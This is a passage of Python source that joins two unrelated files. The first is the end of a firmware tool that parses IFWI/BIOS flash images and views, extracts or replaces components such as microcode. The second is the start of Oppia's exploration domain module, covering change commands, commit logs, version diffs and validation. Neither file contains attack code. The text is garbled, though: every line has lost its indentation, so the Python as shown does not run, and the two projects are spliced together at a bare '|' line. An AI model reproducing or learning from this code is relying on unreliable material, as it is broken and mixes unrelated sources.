for dir in range(sub_part_dir_hdr.num_of_entries):
part_dir = SUBPART_DIR_ENTRY.from_buffer(
img_data, part_entry.offset + sizeof(SUBPART_DIR_HEADER) +
sizeof(SUBPART_DIR_ENTRY) * dir)
dir_comp = COMPONENT(part_dir.entry_name, COMPONENT.COMP_TYPE['FILE'],
part_entry.offset + part_dir.entry_offset,
part_dir.entry_size)
part_comp.add_child(dir_comp)
offset += sizeof(part_entry)
return bios_comp
@staticmethod
def parse_bios_region (img_data, base_off = 0):
offset = bytes_to_value(img_data[-8:-4]) - (0x100000000 - len(img_data))
if offset <0 or offset >= len(img_data) - 0x10:
return None
fla_map_off = offset
if bytes_to_value(img_data[fla_map_off:fla_map_off+4]) != 0x504d4c46:
return None
bios_comp = COMPONENT('BIOS', COMPONENT.COMP_TYPE['RGN'], base_off, len(img_data))
curr_part = -1
fla_map_str = FLASH_MAP.from_buffer (img_data, fla_map_off)
entry_num = (fla_map_str.length - sizeof(FLASH_MAP)) // sizeof(FLASH_MAP_DESC)
for idx in range (entry_num):
idx = entry_num - 1 - idx
desc = FLASH_MAP_DESC.from_buffer (img_data, fla_map_off + sizeof(FLASH_MAP) + idx * sizeof(FLASH_MAP_DESC))
file_comp = COMPONENT(desc.sig.decode(), COMPONENT.COMP_TYPE['FILE'], desc.offset + base_off, desc.size)
if curr_part != desc.flags & 0x4F:
curr_part = desc.flags & 0x4F
part_comp = COMPONENT('%s' % (FLASH_MAP.FLASH_MAP_REGION[curr_part]), COMPONENT.COMP_TYPE['PART'], desc.offset + base_off, desc.size)
bios_comp.add_child (part_comp)
else:
part_comp.length += desc.size
part_comp.add_child(file_comp)
return bios_comp
@staticmethod
def parse_ifwi_binary(img_data):
if len(img_data) < 0x1000:
return None
ifwi_comp = COMPONENT('IFWI', COMPONENT.COMP_TYPE['IFWI'], 0, len(img_data))
bios_comp = IFWI_PARSER.parse_bios_bpdt (img_data)
if bios_comp is not None:
ifwi_comp.add_child (bios_comp)
return ifwi_comp
spi_descriptor = SPI_DESCRIPTOR.from_buffer(img_data)
if spi_descriptor.fl_val_sig != spi_descriptor.DESC_SIGNATURE:
# no SPI descriptor, try to check the flash map
bios_comp = IFWI_PARSER.parse_bios_region (img_data, 0)
if bios_comp is not None:
ifwi_comp.add_child (bios_comp)
return ifwi_comp
# It is a full IFWI image
bios_comp = None
ifwi_comp = COMPONENT('IFWI', COMPONENT.COMP_TYPE['IFWI'], 0, len(img_data))
rgn_dict = sorted(SPI_DESCRIPTOR.FLASH_REGIONS, key=SPI_DESCRIPTOR.FLASH_REGIONS.get)
for rgn in rgn_dict:
rgn_start, rgn_limit = IFWI_PARSER.find_ifwi_region(spi_descriptor, rgn)
if rgn_start is None:
continue
rgn_comp = COMPONENT(rgn.upper(), COMPONENT.COMP_TYPE['RGN'], rgn_start, rgn_limit - rgn_start + 1)
if rgn == 'bios':
bios_comp = rgn_comp
else:
ifwi_comp.add_child (rgn_comp)
if bios_comp is None:
return None
bios_start = bios_comp.offset
bios_limit = bios_comp.offset + bios_comp.length - 1
if not (img_data[bios_start] == 0xAA and img_data[bios_start + 1] == 0x55):
# normal layout
new_bios_comp = IFWI_PARSER.parse_bios_region (img_data[bios_start:bios_limit+1], bios_start)
if new_bios_comp is not None:
bios_comp = new_bios_comp
ifwi_comp.add_child (bios_comp)
ifwi_comp.child.sort (key=lambda x: x.offset)
return ifwi_comp
# Sort region by offset
ifwi_comp.add_child (bios_comp)
ifwi_comp.child.sort (key=lambda x: x.offset)
# It is BPDT format
bp_offset = [bios_start, (bios_start + bios_limit + 1) // 2]
for idx, offset in enumerate(bp_offset):
bp_comp = COMPONENT('BP%d' % idx, COMPONENT.COMP_TYPE['BP'], offset,
(bios_limit - bios_start + 1) // 2)
sub_part_offset = 0
while True:
bpdt, sbpdt_entry = IFWI_PARSER.bpdt_parser(img_data, offset, sub_part_offset)
bpdt_prefix = '' if sub_part_offset == 0 else 'S'
bpdt_size = sbpdt_entry.sub_part_offset if sbpdt_entry else bpdt_comp.child[-1].length
bpdt_comp = COMPONENT('%sBPDT' % bpdt_prefix, COMPONENT.COMP_TYPE['BPDT'],
offset + sub_part_offset, bpdt_size)
sorted_bpdt = sorted(bpdt, key=lambda x: x[0].sub_part_offset)
for part, dir_list in sorted_bpdt:
if not part.sub_part_size:
continue
part_comp = COMPONENT(
str(part.type), COMPONENT.COMP_TYPE['PART'],
offset + part.sub_part_offset, part.sub_part_size)
sorted_dir = sorted(dir_list, key=lambda x: x.entry_offset)
for dir in sorted_dir:
file_comp = COMPONENT(dir.entry_name.decode(), COMPONENT.COMP_TYPE['FILE'],
part_comp.offset + dir.entry_offset,
dir.entry_size)
part_comp.add_child(file_comp)
bpdt_comp.add_child(part_comp)
bp_comp.add_child(bpdt_comp)
if sbpdt_entry:
sub_part_offset = sbpdt_entry.sub_part_offset
else:
break
bios_comp.add_child(bp_comp)
return ifwi_comp
if __name__ == '__main__':
parser = argparse.ArgumentParser()
subparsers = parser.add_subparsers(title='commands')
parser_view = subparsers.add_parser('view', help='print IFWI component layout')
parser_view.set_defaults(which='view')
parser_view.add_argument('-i', '--input-image', dest='ifwi_image', type=str,
required=True, help='Specify input IFWI image file path')
parser_replace = subparsers.add_parser('replace', help='replace component in IFWI')
parser_replace.set_defaults(which='replace')
parser_replace.add_argument('-f', '--component-image', dest='comp_image', type=str,
default = '', help="Specify component image file")
parser_replace.add_argument('-i', '--input-image', dest='ifwi_image', type=str,
required=True, help='Specify input IFWI image file path')
parser_replace.add_argument('-o', '--output-image', dest='output_image', type=str,
default = '', help='Specify output IFWI image file path')
parser_replace.add_argument('-p', '--path', dest='component_path', type=str,
default = '', help='Specify replace path in IFWI image flashmap')
parser_replace.add_argument('-u', '--input-ucode-dir', dest='input_ucode_dir', type=str,
default = '', help="Specify a directory containing all microcode to pack if the '-p' path is a microcode component")
parser_extract = subparsers.add_parser('extract', help='extract component from IFWI')
parser_extract.set_defaults(which='extract')
parser_extract.add_argument('-i', '--input-image', dest='ifwi_image', type=str,
required=True, help='Specify input IFWI image file path')
parser_extract.add_argument('-o', '--output-component', dest='output_image', type=str,
default = '', help='Specify output component image file path')
parser_extract.add_argument('-p', '--path', dest='component_path', type=str,
default = '', help='Specify component path to be extracted from IFWI image')
parser_extract.add_argument('-u', '--output-ucode-dir', dest='output_ucode_dir', type=str,
default = '', help="Specify a directory to store the extraced microcode binaries if the '-p' path is a microcode component")
args = parser.parse_args()
ifwi = None
ifwi_bin = bytearray (get_file_data (args.ifwi_image))
ret = -1
show = False
if args.which == 'view':
show = True
elif args.which == 'extract':
comp_bin = bytearray ()
if not args.component_path:
show = True
else:
ret = IFWI_PARSER.extract_component (ifwi_bin, comp_bin, args.component_path)
if ret == 0:
out_image = args.output_image
if out_image:
gen_file_from_object (out_image, comp_bin)
print ("Components @ %s was extracted successfully!" % args.component_path)
parts = args.component_path.split('/')
if len(parts) > 0 and parts[-1] == 'UCOD' and args.output_ucode_dir:
out_dir = args.output_ucode_dir
if not os.path.exists(out_dir):
os.mkdir (out_dir)
else:
if not os.path.isdir (out_dir):
parser.error('-u needs to be a directory !')
ucode = UCODE_PARSER ()
ucode.dump (comp_bin)
ucode.extract (comp_bin, out_dir)
elif args.which == 'replace':
if args.comp_image and args.input_ucode_dir:
parser_replace.error("Option '-f' and '-u' are exclusive !")
if not args.component_path:
show = True
else:
if args.input_ucode_dir:
parts = args.component_path.split('/')
if len(parts) > 0 and parts[-1] == 'UCOD':
comp_bin = UCODE_PARSER.pack (args.input_ucode_dir)
else:
parser_replace.error("Option '-p' needs to be a microcode component path !")
else:
if not args.comp_image:
parser_replace.error('Component image file is required when path is specified!')
comp_bin = bytearray (get_file_data (args.comp_image))
ret = IFWI_PARSER.replace_component (ifwi_bin, comp_bin, args.component_path)
if ret == 0:
if args.input_ucode_dir:
ret = IFWI_PARSER.update_ucode_fit_entry (ifwi_bin, args.component_path)
if ret == 0:
out_image = args.output_image if args.output_image else args.ifwi_image
gen_file_from_object (out_image, ifwi_bin)
print ("Components @ %s was replaced successfully!" % args.component_path)
if show:
ifwi = IFWI_PARSER.parse_ifwi_binary (ifwi_bin)
if ifwi:
IFWI_PARSER.print_tree (ifwi)
ret = 0
if ret != 0:
raise Exception ('Execution failed for %s !' % sys.argv[0])
sys.exit(ret)
|
# coding: utf-8
#
# Copyright 2014 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Domain objects for an exploration, its states, and their constituents.
Domain objects capture domain-specific logic and are agnostic of how the
objects they represent are stored. All methods and properties in this file
should therefore be independent of the specific storage models used.
"""
from __future__ import absolute_import # pylint: disable=import-only-modules
from __future__ import unicode_literals # pylint: disable=import-only-modules
import collections
import copy
import functools
import re
import string
from constants import constants
from core.domain import change_domain
from core.domain import html_validation_service
from core.domain import interaction_registry
from core.domain import param_domain
from core.domain import state_domain
from core.platform import models
import feconf
import python_utils
import utils
(exp_models,) = models.Registry.import_models([models.NAMES.exploration])
# Do not modify the values of these constants. This is to preserve backwards
# compatibility with previous change dicts.
# TODO(bhenning): Prior to July 2015, exploration changes involving rules were
# logged using the key 'widget_handlers'. These need to be migrated to
# 'answer_groups' and 'default_outcome'.
STATE_PROPERTY_PARAM_CHANGES = 'param_changes'
STATE_PROPERTY_CONTENT = 'content'
STATE_PROPERTY_SOLICIT_ANSWER_DETAILS = 'solicit_answer_details'
STATE_PROPERTY_RECORDED_VOICEOVERS = 'recorded_voiceovers'
STATE_PROPERTY_WRITTEN_TRANSLATIONS = 'written_translations'
STATE_PROPERTY_INTERACTION_ID = 'widget_id'
STATE_PROPERTY_INTERACTION_CUST_ARGS = 'widget_customization_args'
STATE_PROPERTY_INTERACTION_ANSWER_GROUPS = 'answer_groups'
STATE_PROPERTY_INTERACTION_DEFAULT_OUTCOME = 'default_outcome'
STATE_PROPERTY_UNCLASSIFIED_ANSWERS = (
'confirmed_unclassified_answers')
STATE_PROPERTY_INTERACTION_HINTS = 'hints'
STATE_PROPERTY_INTERACTION_SOLUTION = 'solution'
# Deprecated state properties.
STATE_PROPERTY_CONTENT_IDS_TO_AUDIO_TRANSLATIONS_DEPRECATED = (
'content_ids_to_audio_translations') # Deprecated in state schema v27.
# These four properties are kept for legacy purposes and are not used anymore.
STATE_PROPERTY_INTERACTION_HANDLERS = 'widget_handlers'
STATE_PROPERTY_INTERACTION_STICKY = 'widget_sticky'
GADGET_PROPERTY_VISIBILITY = 'gadget_visibility'
GADGET_PROPERTY_CUST_ARGS = 'gadget_customization_args'
# This takes additional 'title' and 'category' parameters.
CMD_CREATE_NEW = 'create_new'
# This takes an additional 'state_name' parameter.
CMD_ADD_STATE = 'add_state'
# This takes additional 'old_state_name' and 'new_state_name' parameters.
CMD_RENAME_STATE = 'rename_state'
# This takes an additional 'state_name' parameter.
CMD_DELETE_STATE = 'delete_state'
# This takes additional 'state_name', 'content_id', 'language_code' and
# 'content_html' and 'translation_html' parameters.
CMD_ADD_TRANSLATION = 'add_translation'
# This takes additional 'property_name' and 'new_value' parameters.
CMD_EDIT_STATE_PROPERTY = 'edit_state_property'
# This takes additional 'property_name' and 'new_value' parameters.
CMD_EDIT_EXPLORATION_PROPERTY = 'edit_exploration_property'
# This takes additional 'from_version' and 'to_version' parameters for logging.
CMD_MIGRATE_STATES_SCHEMA_TO_LATEST_VERSION = (
'migrate_states_schema_to_latest_version')
# These are categories to which answers may be classified. These values should
# not be changed because they are persisted in the data store within answer
# logs.
# Represents answers classified using rules defined as part of an interaction.
EXPLICIT_CLASSIFICATION = 'explicit'
# Represents answers which are contained within the training data of an answer
# group.
TRAINING_DATA_CLASSIFICATION = 'training_data_match'
# Represents answers which were predicted using a statistical training model
# from training data within an answer group.
STATISTICAL_CLASSIFICATION = 'statistical_classifier'
# Represents answers which led to the 'default outcome' of an interaction,
# rather than belonging to a specific answer group.
DEFAULT_OUTCOME_CLASSIFICATION = 'default_outcome'
class ExplorationChange(change_domain.BaseChange):
"""Domain object class for an exploration change.
IMPORTANT: Ensure that all changes to this class (and how these cmds are
interpreted in general) preserve backward-compatibility with the
exploration snapshots in the datastore. Do not modify the definitions of
cmd keys that already exist.
NOTE TO DEVELOPERS: Please note that, for a brief period around
Feb - Apr 2017, change dicts related to editing of answer groups
accidentally stored the old_value using a ruleSpecs key instead of a
rule_specs key. So, if you are making use of this data, make sure to
verify the format of the old_value before doing any processing.
The allowed commands, together with the attributes:
- 'add_state' (with state_name)
- 'rename_state' (with old_state_name and new_state_name)
- 'delete_state' (with state_name)
- 'edit_state_property' (with state_name, property_name,
new_value and, optionally, old_value)
- 'edit_exploration_property' (with property_name,
new_value and, optionally, old_value)
- 'migrate_states_schema' (with from_version, to_version)
For a state, property_name must be one of STATE_PROPERTIES.
For an exploration, property_name must be one of
EXPLORATION_PROPERTIES.
"""
# The allowed list of state properties which can be used in
# edit_state_property command.
STATE_PROPERTIES = (
STATE_PROPERTY_PARAM_CHANGES,
STATE_PROPERTY_CONTENT,
STATE_PROPERTY_SOLICIT_ANSWER_DETAILS,
STATE_PROPERTY_RECORDED_VOICEOVERS,
STATE_PROPERTY_WRITTEN_TRANSLATIONS,
STATE_PROPERTY_INTERACTION_ID,
STATE_PROPERTY_INTERACTION_CUST_ARGS,
STATE_PROPERTY_INTERACTION_STICKY,
STATE_PROPERTY_INTERACTION_HANDLERS,
STATE_PROPERTY_INTERACTION_ANSWER_GROUPS,
STATE_PROPERTY_INTERACTION_DEFAULT_OUTCOME,
STATE_PROPERTY_INTERACTION_HINTS,
STATE_PROPERTY_INTERACTION_SOLUTION,
STATE_PROPERTY_UNCLASSIFIED_ANSWERS,
# Deprecated state properties.
STATE_PROPERTY_CONTENT_IDS_TO_AUDIO_TRANSLATIONS_DEPRECATED)
# The allowed list of exploration properties which can be used in
# edit_exploration_property command.
EXPLORATION_PROPERTIES = (
'title', 'category', 'objective', 'language_code', 'tags',
'blurb', 'author_notes', 'param_specs', 'param_changes',
'init_state_name', 'auto_tts_enabled', 'correctness_feedback_enabled')
ALLOWED_COMMANDS = [{
'name': CMD_CREATE_NEW,
'required_attribute_names': ['category', 'title'],
'optional_attribute_names': []
}, {
'name': CMD_ADD_STATE,
'required_attribute_names': ['state_name'],
'optional_attribute_names': []
}, {
'name': CMD_DELETE_STATE,
'required_attribute_names': ['state_name'],
'optional_attribute_names': []
}, {
'name': CMD_RENAME_STATE,
'required_attribute_names': ['new_state_name', 'old_state_name'],
'optional_attribute_names': []
}, {
'name': CMD_ADD_TRANSLATION,
'required_attribute_names': [
'state_name', 'content_id', 'language_code', 'content_html',
'translation_html'],
'optional_attribute_names': []
}, {
'name': CMD_EDIT_STATE_PROPERTY,
'required_attribute_names': [
'property_name', 'state_name', 'new_value'],
'optional_attribute_names': ['old_value'],
'allowed_values': {'property_name': STATE_PROPERTIES}
}, {
'name': CMD_EDIT_EXPLORATION_PROPERTY,
'required_attribute_names': ['property_name', 'new_value'],
'optional_attribute_names': ['old_value'],
'allowed_values': {'property_name': EXPLORATION_PROPERTIES}
}, {
'name': CMD_MIGRATE_STATES_SCHEMA_TO_LATEST_VERSION,
'required_attribute_names': ['from_version', 'to_version'],
'optional_attribute_names': []
}, {
'name': exp_models.ExplorationModel.CMD_REVERT_COMMIT,
'required_attribute_names': ['version_number'],
'optional_attribute_names': []
}]
class ExplorationCommitLogEntry(python_utils.OBJECT):
"""Value object representing a commit to an exploration."""
def __init__(
self, created_on, last_updated, user_id, username, exploration_id,
commit_type, commit_message, commit_cmds, version,
post_commit_status, post_commit_community_owned,
post_commit_is_private):
"""Initializes a ExplorationCommitLogEntry domain object.
Args:
created_on: datetime.datetime. Date and time when the exploration
commit was created.
last_updated: datetime.datetime. Date and time when the exploration
commit was last updated.
user_id: str. User id of the user who has made the commit.
username: str. Username of the user who has made the commit.
exploration_id: str. Id of the exploration.
commit_type: str. The type of commit.
commit_message: str. A description of changes made to the
exploration.
commit_cmds: list(dict). A list of commands, describing changes
made in this model, which should give sufficient information to
reconstruct the commit. Each dict always contains the following
key:
- cmd: str. Unique command.
and then additional arguments for that command.
version: int. The version of the exploration after the commit.
post_commit_status: str. The new exploration status after the
commit.
post_commit_community_owned: bool. Whether the exploration is
community-owned after the edit event.
post_commit_is_private: bool. Whether the exploration is private
after the edit event.
"""
self.created_on = created_on
self.last_updated = last_updated
self.user_id = user_id
self.username = username
self.exploration_id = exploration_id
self.commit_type = commit_type
self.commit_message = commit_message
self.commit_cmds = commit_cmds
self.version = version
self.post_commit_status = post_commit_status
self.post_commit_community_owned = post_commit_community_owned
self.post_commit_is_private = post_commit_is_private
def to_dict(self):
"""Returns a dict representing this ExplorationCommitLogEntry domain
object. This omits created_on, user_id and commit_cmds.
Returns:
dict. A dict, mapping all fields of ExplorationCommitLogEntry
instance, except created_on, user_id and commit_cmds fields.
"""
return {
'last_updated': utils.get_time_in_millisecs(self.last_updated),
'username': self.username,
'exploration_id': self.exploration_id,
'commit_type': self.commit_type,
'commit_message': self.commit_message,
'version': self.version,
'post_commit_status': self.post_commit_status,
'post_commit_community_owned': self.post_commit_community_owned,
'post_commit_is_private': self.post_commit_is_private,
}
class ExpVersionReference(python_utils.OBJECT):
"""Value object representing an exploration ID and a version number."""
def __init__(self, exp_id, version):
"""Initializes an ExpVersionReference domain object.
Args:
exp_id: str. ID of the exploration.
version: int. Version of the exploration.
"""
self.exp_id = exp_id
self.version = version
self.validate()
def to_dict(self):
"""Returns a dict representing this ExpVersionReference domain object.
Returns:
dict. A dict, mapping all fields of ExpVersionReference instance.
"""
return {
'exp_id': self.exp_id,
'version': self.version
}
def validate(self):
"""Validates properties of the ExpVersionReference.
Raises:
ValidationError: One or more attributes of the ExpVersionReference
are invalid.
"""
if not isinstance(self.exp_id, python_utils.BASESTRING):
raise utils.ValidationError(
'Expected exp_id to be a str, received %s' % self.exp_id)
if not isinstance(self.version, int):
raise utils.ValidationError(
'Expected version to be an int, received %s' % self.version)
class ExplorationVersionsDiff(python_utils.OBJECT):
"""Domain object for the difference between two versions of an Oppia
exploration.
Attributes:
added_state_names: list(str). Name of the states added to the
exploration from prev_exp_version to current_exp_version.
deleted_state_names: list(str). Name of the states deleted from the
exploration from prev_exp_version to current_exp_version.
new_to_old_state_names: dict. Dictionary mapping state names of
current_exp_version to the state names of prev_exp_version.
old_to_new_state_names: dict. Dictionary mapping state names of
prev_exp_version to the state names of current_exp_version.
"""
def __init__(self, change_list):
"""Constructs an ExplorationVersionsDiff domain object.
Args:
change_list: list(ExplorationChange). A list of all of the commit
cmds from the old version of the exploration up to the next
version.
"""
added_state_names = []
deleted_state_names = []
new_to_old_state_names = {}
for change in change_list:
if change.cmd == CMD_ADD_STATE:
added_state_names.append(change.state_name)
elif change.cmd == CMD_DELETE_STATE:
state_name = change.state_name
if state_name in added_state_names:
added_state_names.remove(state_name)
else:
original_state_name = state_name
if original_state_name in new_to_old_state_names:
original_state_name = new_to_old_state_names.pop(
original_state_name)
deleted_state_names.append(original_state_name)
elif change.cmd == CMD_RENAME_STATE:
old_state_name = change.old_state_name
new_state_name = change.new_state_name
if old_state_name in added_state_names:
added_state_names.remove(old_state_name)
added_state_names.append(new_state_name)
elif old_state_name in new_to_old_state_names:
new_to_old_state_names[new_state_name] = (
new_to_old_state_names.pop(old_state_name))
else:
new_to_old_state_names[new_state_name] = old_state_name
self.added_state_names = added_state_names
self.deleted_state_names = deleted_state_names
self.new_to_old_state_names = new_to_old_state_names
self.old_to_new_state_names = {
value: key for key, value in new_to_old_state_names.items()
}
class Exploration(python_utils.OBJECT):
"""Domain object for an Oppia exploration."""
def __init__(
self, exploration_id, title, category, objective,
language_code, tags, blurb, author_notes,
states_schema_version, init_state_name, states_dict,
param_specs_dict, param_changes_list, version,
auto_tts_enabled, correctness_feedback_enabled,
created_on=None, last_updated=None):
"""Initializes an Exploration domain object.
Args:
exploration_id: str. The exploration id.
title: str. The exploration title.
category: str. The category of the exploration.
objective: str. The objective of the exploration.
language_code: str. The language code of the exploration.
tags: list(str). The tags given to the exploration.
blurb: str. The blurb of the exploration.
author_notes: str. The author notes.
states_schema_version: int. Tbe schema version of the exploration.
init_state_name: str. The name for the initial state of the
exploration.
states_dict: dict. A dict where each key-value pair represents,
respectively, a state name and a dict used to initialize a
State domain object.
param_specs_dict: dict. A dict where each key-value pair represents
respectively, a param spec name and a dict used to initialize a
ParamSpec domain object.
param_changes_list: list(dict). List of dict where each dict is
used to initialize a ParamChange domain object.
version: int. The version of the exploration.
auto_tts_enabled: bool. True if automatic text-to-speech is
enabled.
correctness_feedback_enabled: bool. True if correctness feedback is
enabled.
created_on: datetime.datetime. Date and time when the exploration
is created.
last_updated: datetime.datetime. Date and time when the exploration
was last updated.
"""
self.id = exploration_id
self.title = title
self.category = category
self.objective = objective
self.language_code = language_code
self.tags = tags
self.blurb = blurb
self.author_notes = author_notes
self.states_schema_version = states_schema_version
self.init_state_name = init_state_name
self.states = {}
for (state_name, state_dict) in states_dict.items():
self.states[state_name] = state_domain.State.from_dict(state_dict)
self.param_specs = {
ps_name: param_domain.ParamSpec.from_dict(ps_val)
for (ps_name, ps_val) in param_specs_dict.items()
}
self.param_changes = [
param_domain.ParamChange.from_dict(param_change_dict)
for param_change_dict in param_changes_list]
self.version = version
self.created_on = created_on
self.last_updated = last_updated
self.auto_tts_enabled = auto_tts_enabled
self.correctness_feedback_enabled = correctness_feedback_enabled
@classmethod
def create_default_exploration(
cls, exploration_id, title=feconf.DEFAULT_EXPLORATION_TITLE,
init_state_name=feconf.DEFAULT_INIT_STATE_NAME,
category=feconf.DEFAULT_EXPLORATION_CATEGORY,
objective=feconf.DEFAULT_EXPLORATION_OBJECTIVE,
language_code=constants.DEFAULT_LANGUAGE_CODE):
"""Returns a Exploration domain object with default values.
'title', 'init_state_name', 'category', 'objective' if not provided are
taken from feconf; 'tags' and 'param_changes_list' are initialized to
empty list; 'states_schema_version' is taken from feconf; 'states_dict'
is derived from feconf; 'param_specs_dict' is an empty dict; 'blurb' and
'author_notes' are initialized to empty string; 'version' is
initializated to 0.
Args:
exploration_id: str. The id of the exploration.
title: str. The exploration title.
init_state_name: str. The name of the initial state.
category: str. The category of the exploration.
objective: str. The objective of the exploration.
language_code: str. The language code of the exploration.
Returns:
Exploration. The Exploration domain object with default
values.
"""
init_state_dict = state_domain.State.create_default_state(
init_state_name, is_initial_state=True).to_dict()
states_dict = {
init_state_name: init_state_dict
}
return cls(
exploration_id, title, category, objective, language_code, [], '',
'', feconf.CURRENT_STATE_SCHEMA_VERSION,
init_state_name, states_dict, {}, [], 0,
feconf.DEFAULT_AUTO_TTS_ENABLED, False)
@classmethod
def from_dict(
cls, exploration_dict,
exploration_version=0, exploration_created_on=None,
exploration_last_updated=None):
"""Return a Exploration domain object from a dict.
Args:
exploration_dict: dict. The dict representation of Exploration
object.
exploration_version: int. The version of the exploration.
exploration_created_on: datetime.datetime. Date and time when the
exploration is created.
exploration_last_updated: datetime.datetime. Date and time when the
exploration was last updated.
Returns:
Exploration. The corresponding Exploration domain object.
"""
# NOTE TO DEVELOPERS: It is absolutely ESSENTIAL this conversion to and
# from an ExplorationModel/dictionary MUST be exhaustive and complete.
exploration = cls.create_default_exploration(
exploration_dict['id'],
title=exploration_dict['title'],
category=exploration_dict['category'],
objective=exploration_dict['objective'],
language_code=exploration_dict['language_code'])
exploration.tags = exploration_dict['tags']
exploration.blurb = exploration_dict['blurb']
exploration.author_notes = exploration_dict['author_notes']
exploration.auto_tts_enabled = exploration_dict['auto_tts_enabled']
exploration.correctness_feedback_enabled = exploration_dict[
'correctness_feedback_enabled']
exploration.param_specs = {
ps_name: param_domain.ParamSpec.from_dict(ps_val) for
(ps_name, ps_val) in exploration_dict['param_specs'].items()
}
exploration.states_schema_version = exploration_dict[
'states_schema_version']
init_state_name = exploration_dict['init_state_name']
exploration.rename_state(exploration.init_state_name, init_state_name)
exploration.add_states([
state_name for state_name in exploration_dict['states']
if state_name != init_state_name])
for (state_name, sdict) in exploration_dict['states'].items():
state = exploration.states[state_name]
state.content = state_domain.SubtitledHtml(
sdict['content']['content_id'], sdict['content']['html'])
state.param_changes = [param_domain.ParamChange(
pc['name'], pc['generator_id'], pc['customization_args']
) for pc in sdict['param_changes']]
for pc in state.param_changes:
if pc.name not in exploration.param_specs:
raise Exception('Parameter %s was used in a state but not '
'declared in the exploration param_specs.'
% pc.name)
idict = sdict['interaction']
interaction_answer_groups = [
state_domain.AnswerGroup.from_dict(group)
for group in idict['answer_groups']]
default_outcome = (
state_domain.Outcome.from_dict(idict['default_outcome'])
if idict['default_outcome'] is not None else None)
solution = (
state_domain.Solution.from_dict(idict['id'], idict['solution'])
if idict['solution'] else None)
state.interaction = state_domain.InteractionInstance(
idict['id'], idict['customization_args'],
interaction_answer_groups, default_outcome,
idict['confirmed_unclassified_answers'],
[state_domain.Hint.from_dict(h) for h in idict['hints']],
solution)
state.recorded_voiceovers = (
state_domain.RecordedVoiceovers.from_dict(
sdict['recorded_voiceovers']))
state.written_translations = (
state_domain.WrittenTranslations.from_dict(
sdict['written_translations']))
state.solicit_answer_details = sdict['solicit_answer_details']
exploration.states[state_name] = state
exploration.param_changes = [
param_domain.ParamChange.from_dict(pc)
for pc in exploration_dict['param_changes']]
exploration.version = exploration_version
exploration.created_on = exploration_created_on
exploration.last_updated = exploration_last_updated
return exploration
@classmethod
def _validate_state_name(cls, name):
"""Validates name string.
Args:
name: str. The name to validate.
"""
utils.require_valid_name(name, 'a state name')
def validate(self, strict=False):
"""Validates various properties of the Exploration.
Args:
strict: bool. If True, the exploration is assumed to be published,
and the validation checks are stricter.
Raises:
ValidationError: One or more attributes of the Exploration are
invalid.
"""
if not isinstance(self.title, python_utils.BASESTRING):
raise utils.ValidationError(
'Expected title to be a string, received %s' % self.title)
utils.require_valid_name(
self.title, 'the exploration title', allow_empty=True)
if not isinstance(self.category, python_utils.BASESTRING):
raise utils.ValidationError(
'Expected category to be a string, received %s'
% self.category)
utils.require_valid_name(
self.category, 'the exploration category', allow_empty=True)
if not isinstance(self.objective, python_utils.BASESTRING):
raise utils.ValidationError(
'Expected objective to be a string, received %s' %
self.objective)
if not isinstance(self.language_code, python_utils.BASESTRING):
raise utils.ValidationError(
'Expected language_code to be a string, received %s' %
self.language_code)
if not utils.is_valid_language_code(self.language_code):
raise utils.ValidationError(
'Invalid language_code: %s' % self.language_code)
if not isinstance(self.tags, list):
raise utils.ValidationError(
'Expected \'tags\' to be a list, received %s' % self.tags)
for tag in self.tags:
if not isinstance(tag, python_utils.BASESTRING):
raise utils.ValidationError(
'Expected each tag in \'tags\' to be a string, received '
'\'%s\'' % tag)
if not tag:
raise utils.ValidationError('Tags should be non-empty.')
if not re.match(constants.TAG_REGEX, tag):
raise utils.ValidationError(
'Tags should only contain lowercase letters and spaces, '
'received \'%s\'' % tag)
if (tag[0] not in string.ascii_lowercase or
tag[-1] not in string.ascii_lowercase):
raise utils.ValidationError(
'Tags should not start or end with whitespace, received '
' \'%s\'' % tag)
if re.search(r'\s\s+', tag):
raise utils.ValidationError(
'Adjacent whitespace in tags should be collapsed, '
'received \'%s\'' % tag)
if len(set(self.tags)) != len(self.tags):
raise utils.ValidationError('Some tags duplicate each other')
if not isinstance(self.blurb, python_utils.BASESTRING):
raise utils.ValidationError(
'Expected blurb to be a string, received %s' % self.blurb)
if not isinstance(self.author_notes, python_utils.BASESTRING):
raise utils.ValidationError(
'Expected author_notes to be a string, received %s' %
self.author_notes)
if not isinstance(self.states, dict):
raise utils.ValidationError(
'Expected states to be a dict, received %s' % self.states)
if not self.states:
raise utils.ValidationError('This exploration has no states.')
for state_name in self.states:
self._validate_state_name(state_name)
state = self.states[state_name]
state.validate(
self.param_specs,
allow_null_interaction=not strict)
# The checks below perform validation on the Outcome domain object
# that is specific to answer groups in explorations, but not
# questions. This logic is here because the validation checks in
# the Outcome domain object are used by both explorations and
# questions.
for answer_group in state.interaction.answer_groups:
if not answer_group.outcome.dest:
raise utils.ValidationError(
'Every outcome should have a destination.')
if not isinstance(
answer_group.outcome.dest, python_utils.BASESTRING):
raise utils.ValidationError(
'Expected outcome dest to be a string, received %s'
% answer_group.outcome.dest)
if state.interaction.default_outcome is not None:
if not state.interaction.default_outcome.dest:
raise utils.ValidationError(
'Every outcome should have a destination.')
if not isinstance(
state.interaction.default_outcome.dest,
python_utils.BASESTRING):
raise utils.ValidationError(
'Expected outcome dest to be a string, received %s'
% state.interaction.default_outcome.dest)
if self.states_schema_version is None:
raise utils.ValidationError(
'This exploration has no states schema version.')
if not self.init_state_name:
raise utils.ValidationError(
'This exploration has no initial state name specified.')
if self.init_state_name not in self.states:
raise utils.ValidationError(
'There is no state in %s corresponding to the exploration\'s '
'initial state name %s.' %
(list(self.states.keys()), self.init_state_name))
if not isinstance(self.param_specs, dict):
raise utils.ValidationError(
'Expected param_specs to be a dict, received %s'
% self.param_specs)
if not isinstance(self.auto_tts_enabled, bool):
raise utils.ValidationError(
'Expected auto_tts_enabled to be a bool, received %s'
% self.auto_tts_enabled)
if not isinstance(self.correctness_feedback_enabled, bool):
raise utils.ValidationError(
'Expected correctness_feedback_enabled to be a bool, received '
'%s' % self.correctness_feedback_enabled)
for param_name in self.param_specs:
if not isinstance(param_name, python_utils.BASESTRING):
raise utils.ValidationError(
'Expected parameter name to be a string, received %s (%s).'
% (param_name, type(param_name)))
